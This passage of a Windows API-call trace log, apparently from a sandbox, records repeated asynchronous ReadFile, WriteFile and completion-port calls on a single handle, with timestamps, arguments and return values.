lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.360] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.360] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.360] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.360] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.361] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.361] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.361] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.361] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.361] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.361] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.361] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.361] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.361] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.361] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.361] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.361] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.361] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.361] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.361] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.361] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.362] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.362] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.362] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.362] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.362] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.362] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.362] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.362] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.362] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.362] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.362] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.362] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.362] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.362] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.362] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.366] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.378] SetEvent (hEvent=0x2e4) returned 1 [0089.378] GetCurrentThreadId () returned 0x5b0 [0089.379] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.379] GetLastError () returned 0x3e5 [0089.379] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.397] GetCurrentThreadId () returned 0x5b0 [0089.397] WriteFile (in: hFile=0x268, lpBuffer=0x2632980, nNumberOfBytesToWrite=0x9f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2632980, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0089.400] SetEvent (hEvent=0x2a4) returned 1 [0089.400] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.401] SetEvent (hEvent=0x244) returned 1 [0089.401] GetCurrentThreadId () returned 0x5b0 [0089.404] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.404] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.405] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.405] SetEvent (hEvent=0x2e4) returned 1 [0089.405] GetCurrentThreadId () returned 0x5b0 [0089.405] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.405] GetLastError () returned 0x3e5 [0089.405] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.405] GetCurrentThreadId () returned 0x5b0 [0089.405] WriteFile (in: hFile=0x268, lpBuffer=0x261ffe8, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x261ffe8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0089.412] SetEvent (hEvent=0x2a4) returned 1 [0089.412] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.412] SetEvent (hEvent=0x244) returned 1 [0089.412] GetCurrentThreadId () returned 0x5b0 [0089.412] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.413] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.413] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.413] SetEvent (hEvent=0x2e4) returned 1 [0089.413] GetCurrentThreadId () returned 0x5b0 [0089.413] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.413] GetLastError () returned 0x3e5 [0089.413] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.413] GetCurrentThreadId () returned 0x5b0 [0089.413] WriteFile (in: hFile=0x268, lpBuffer=0x26047a8, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x26047a8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0089.416] SetEvent (hEvent=0x2a4) returned 1 [0089.416] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.420] SetEvent (hEvent=0x244) returned 1 [0089.420] GetCurrentThreadId () returned 0x5b0 [0089.420] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.421] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.421] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.421] SetEvent (hEvent=0x2e4) returned 1 [0089.421] GetCurrentThreadId () returned 0x5b0 [0089.421] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.421] GetLastError () returned 0x3e5 [0089.421] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.421] GetCurrentThreadId () returned 0x5b0 [0089.421] WriteFile (in: hFile=0x268, lpBuffer=0x26047a8, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x26047a8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0089.424] SetEvent (hEvent=0x2a4) returned 1 [0089.426] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.462] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.468] SetEvent (hEvent=0x244) returned 1 [0089.468] GetCurrentThreadId () returned 0x5b0 [0089.468] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.468] GetLastError () returned 0x3e5 [0089.468] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.478] SetEvent (hEvent=0x244) returned 1 [0089.478] GetCurrentThreadId () returned 0x5b0 [0089.478] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.478] GetLastError () returned 0x3e5 [0089.478] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.478] SetEvent (hEvent=0x2e4) returned 1 [0089.478] GetCurrentThreadId () returned 0x5b0 [0089.478] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.478] GetLastError () returned 0x3e5 [0089.478] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.479] GetCurrentThreadId () returned 0x5b0 [0089.479] WriteFile (in: hFile=0x268, lpBuffer=0x2620030, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0089.479] SetEvent (hEvent=0x300) returned 1 [0089.479] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.479] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.482] SetEvent (hEvent=0x244) returned 1 [0089.482] GetCurrentThreadId () returned 0x5b0 [0089.482] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.482] GetLastError () returned 0x3e5 [0089.482] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.485] SetEvent (hEvent=0x2e4) returned 1 [0089.485] GetCurrentThreadId () returned 0x5b0 [0089.485] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.485] GetLastError () returned 0x3e5 [0089.485] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.486] GetCurrentThreadId () returned 0x5b0 [0089.486] WriteFile (in: hFile=0x268, lpBuffer=0x26388c0, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x26388c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0089.486] SetEvent (hEvent=0x300) returned 1 [0089.486] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.486] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.516] SetEvent (hEvent=0x244) returned 1 [0089.516] GetCurrentThreadId () returned 0x5b0 [0089.516] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.517] GetLastError () returned 0x3e5 [0089.517] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.534] SetEvent (hEvent=0x244) returned 1 [0089.534] GetCurrentThreadId () returned 0x5b0 [0089.534] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.534] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.534] SetEvent (hEvent=0x2e4) returned 1 [0089.534] GetCurrentThreadId () returned 0x5b0 [0089.534] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.534] GetLastError () returned 0x3e5 [0089.534] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.535] GetCurrentThreadId () returned 0x5b0 [0089.535] WriteFile (in: hFile=0x268, lpBuffer=0x2627918, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2627918, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0089.535] SetEvent (hEvent=0x2fc) returned 1 [0089.535] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.535] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.537] SetEvent (hEvent=0x244) returned 1 [0089.538] GetCurrentThreadId () returned 0x5b0 [0089.538] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0089.538] GetLastError () returned 0x3e5 [0089.538] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, 